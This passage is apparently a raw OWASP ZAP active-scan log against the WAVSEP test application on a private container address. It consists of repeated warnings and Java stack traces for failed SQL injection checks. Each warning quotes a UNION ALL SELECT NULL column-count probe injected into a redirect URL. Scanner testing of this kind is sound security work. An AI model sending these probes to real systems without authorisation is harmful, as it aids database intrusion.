org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682344 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682345 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682345 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682346 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682347 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682347 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682348 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682348 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682349 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682349 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682351 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682351 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682352 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 